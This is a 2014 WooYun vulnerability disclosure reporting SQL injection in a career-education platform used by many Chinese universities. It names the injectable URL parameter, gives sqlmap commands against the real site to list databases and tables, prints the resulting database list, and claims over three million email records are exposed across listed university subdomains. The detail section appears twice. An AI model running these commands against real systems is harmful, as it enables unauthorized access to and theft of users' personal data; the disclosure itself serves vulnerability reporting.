当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079049

漏洞标题:某大型学习平台SQL注入,300多万条邮箱记录

相关厂商:cncert国家互联网应急中心

漏洞作者: answer

提交时间:2014-10-27 10:16

修复时间:2014-12-11 10:18

公开时间:2014-12-11 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-27: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-11: 细节向公众公开

简要描述:

不给通用 就求一次前台啊

详细说明:

名称:锦成网职业教育平台
信息量巨大
邮箱估计就有300多万个,其他库还未深入
官方站:http://www.jincin.com/index.htm
点进入学校空间:

E55NGB8MIM]GUBMSC3R03RK.jpg


300多个大学
随便选个学校:tjtc.jincin.com
注入点:/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1(Kinds参数存在注入)
sqlmap自动化:
sqlmap -u "tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1" --dbs
100多个库:
available databases [101]:
[*] Advertisement
[*] Base
[*] Comm
[*] Comm0
[*] Comm1
[*] Comm2
[*] Comm3
[*] Comm4
[*] Creative
[*] Creative0
[*] Creative1
[*] Creative2
[*] Creative3
[*] Creative4
[*] File0
[*] File1
[*] File2
[*] File3
[*] File4
[*] Gov0
[*] Gov1
[*] Gov2
[*] Gov3
[*] Gov4
[*] iforum
[*] IM
[*] IM0
[*] IM1
[*] IM2
[*] IM3
[*] IM4
[*] Information
[*] information_schema
[*] JincinEDU
[*] Meeting
[*] MeetingN
[*] MeetingN0
[*] MeetingN1
[*] mysql
[*] performance_schema
[*] Preservice
[*] Preservice0
[*] Preservice1
[*] Preservice2
[*] Preservice3
[*] Preservice4
[*] QunSpace
[*] QunSpace0
[*] QunSpace1
[*] QunSpace2
[*] QunSpace3
[*] QunSpace4
[*] RealTrain
[*] RealTrain0
[*] RealTrain1
[*] RealTrain2
[*] RealTrain3
[*] RealTrain4
[*] Report
[*] Report0
[*] Report1
[*] Report2
[*] Report3
[*] Report4
[*] School
[*] School0
[*] School1
[*] School2
[*] School3
[*] School4
[*] SoftCenter
[*] SysDB
[*] TeachAssist
[*] TeachAssist0
[*] TeachAssist1
[*] TeachAssist2
[*] TeachAssist3
[*] TeachAssist4
[*] TeachContent
[*] TeachContent0
[*] TeachContent1
[*] TeachContent2
[*] TeachContent3
[*] TeachContent4
[*] test
[*] Training0
[*] Training1
[*] Training2
[*] Training3
[*] Training4
[*] User0
[*] User1
[*] User2
[*] User3
[*] User4
[*] UserSpace
[*] UserSpace0
[*] UserSpace1
[*] UserSpace2
[*] UserSpace3
[*] UserSpace4
挑一个User0库:(证明用户量大,危害性大,这个好像主要是放邮箱的,一共是5个库)
sqlmap -u "tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1" -D "User0" --tables
600多张表

[H[W59Y5M`K1(ZZD8DYU[R9.jpg


再看看一张表有多少字段:
1000多个字段

5UFS2M%OOJ5(P1PVOOR$~SG.jpg


字段的内容是邮箱:

CH{46TQQQ0292A8S0}8N`V4.jpg


(只做样式说明,太多太多)
5个库*600张表*1000个字段 超过300万条记录
无意中还发现了这个

6[JN]HT@)XRG6R1W2M)L}3H.jpg


其他库还没深入 相信还有更多的数据
随意几个学校共审核
tjtc.jincin.com
cwcsb.jincin.com
http://cuc.jincin.com/
http://pku.jincin.com/
http://bucea.jincin.com/
http://bucea.jincin.com/
http://bjypc.jincin.com/
http://cauc.jincin.com/
http://ruc.jincin.com/
http://muc.jincin.com/
............
http://bit.jincin.com/

漏洞证明:

名称:锦成网职业教育平台
信息量巨大
邮箱估计就有300多万个,其他库还未深入
官方站:http://www.jincin.com/index.htm
点进入学校空间:

E55NGB8MIM]GUBMSC3R03RK.jpg


300多个大学
随便选个学校:tjtc.jincin.com
注入点:/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1(Kinds参数存在注入)
sqlmap自动化:
sqlmap -u "tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1" --dbs
100多个库:
available databases [101]:
[*] Advertisement
[*] Base
[*] Comm
[*] Comm0
[*] Comm1
[*] Comm2
[*] Comm3
[*] Comm4
[*] Creative
[*] Creative0
[*] Creative1
[*] Creative2
[*] Creative3
[*] Creative4
[*] File0
[*] File1
[*] File2
[*] File3
[*] File4
[*] Gov0
[*] Gov1
[*] Gov2
[*] Gov3
[*] Gov4
[*] iforum
[*] IM
[*] IM0
[*] IM1
[*] IM2
[*] IM3
[*] IM4
[*] Information
[*] information_schema
[*] JincinEDU
[*] Meeting
[*] MeetingN
[*] MeetingN0
[*] MeetingN1
[*] mysql
[*] performance_schema
[*] Preservice
[*] Preservice0
[*] Preservice1
[*] Preservice2
[*] Preservice3
[*] Preservice4
[*] QunSpace
[*] QunSpace0
[*] QunSpace1
[*] QunSpace2
[*] QunSpace3
[*] QunSpace4
[*] RealTrain
[*] RealTrain0
[*] RealTrain1
[*] RealTrain2
[*] RealTrain3
[*] RealTrain4
[*] Report
[*] Report0
[*] Report1
[*] Report2
[*] Report3
[*] Report4
[*] School
[*] School0
[*] School1
[*] School2
[*] School3
[*] School4
[*] SoftCenter
[*] SysDB
[*] TeachAssist
[*] TeachAssist0
[*] TeachAssist1
[*] TeachAssist2
[*] TeachAssist3
[*] TeachAssist4
[*] TeachContent
[*] TeachContent0
[*] TeachContent1
[*] TeachContent2
[*] TeachContent3
[*] TeachContent4
[*] test
[*] Training0
[*] Training1
[*] Training2
[*] Training3
[*] Training4
[*] User0
[*] User1
[*] User2
[*] User3
[*] User4
[*] UserSpace
[*] UserSpace0
[*] UserSpace1
[*] UserSpace2
[*] UserSpace3
[*] UserSpace4
挑一个User0库:(证明用户量大,危害性大,这个好像主要是放邮箱的,一共是5个库)
sqlmap -u "tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1" -D "User0" --tables
600多张表

[H[W59Y5M`K1(ZZD8DYU[R9.jpg


再看看一张表有多少字段:
1000多个字段

5UFS2M%OOJ5(P1PVOOR$~SG.jpg


字段的内容是邮箱:

CH{46TQQQ0292A8S0}8N`V4.jpg


(只做样式说明,太多太多)
5个库*600张表*1000个字段 超过300万条记录
无意中还发现了这个

6[JN]HT@)XRG6R1W2M)L}3H.jpg


其他库还没深入 相信还有更多的数据
随意几个学校共审核
tjtc.jincin.com
cwcsb.jincin.com
http://cuc.jincin.com/
http://pku.jincin.com/
http://bucea.jincin.com/
http://bucea.jincin.com/
http://bjypc.jincin.com/
http://cauc.jincin.com/
http://ruc.jincin.com/
http://muc.jincin.com/
............
http://bit.jincin.com/

修复方案:

过虑

版权声明:转载请注明来源 answer@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-10-31 17:42

厂商回复:

最新状态:

暂无